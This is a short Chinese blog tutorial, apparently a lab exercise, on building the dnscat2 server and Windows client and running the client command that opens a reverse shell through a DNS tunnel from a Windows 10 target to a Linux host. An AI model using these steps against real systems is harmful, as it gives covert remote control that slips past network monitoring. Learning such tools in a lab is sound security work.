使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

安鸾彭于晏2024-07-18 22:39
  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
skywalk81631 分钟前
快速启动wiki维基百科服务器 kiwix-serve --port=8080 wikipedia_zh_physics_mini_2025-12.zim
linux·运维·服务器·wiki
zl_dfq2 分钟前
Linux 之 【文件】(文件共识原理、open、close、访问文件的本质、文件描述符)
linux
那些年的笔记2 分钟前
Ubuntu22.04 英文界面转成中文界面
linux·运维·服务器
last demo3 分钟前
docker基础
运维·docker·容器·eureka
袁煦丞 cpolar内网穿透实验室3 分钟前
可视化管理服务器:cpolar 内网穿透实验室第 725 个成功挑战
运维·服务器·远程工作·内网穿透·cpolar
上海云盾安全满满5 分钟前
服务器的攻击与防御方法
运维·服务器
新兴AI民工8 分钟前
【Linux内核七】进程管理模块:进程调度管理器sched_class
linux·服务器·linux内核
快乐的划水a9 分钟前
上下文简析
linux·运维·服务器
HABuo9 分钟前
【linux进程控制(一)】进程创建&退出-->fork&退出码详谈
linux·运维·服务器·c语言·c++·ubuntu·centos
EndingCoder10 分钟前
高级类型:联合类型和类型别名
linux·服务器·前端·ubuntu·typescript
热门推荐
01GitHub 镜像站点02网站改了域名,如何查找?03Linux下V2Ray安装配置指南04Labelme从安装到标注:零基础完整指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07自用Proteus(8.15)常用元器件图示和功能介绍(持续更新...)08百度网盘偷偷给电脑“降频”?092025-04-03 Latex学习1——本地配置Latex + VScode环境10UV安装并设置国内源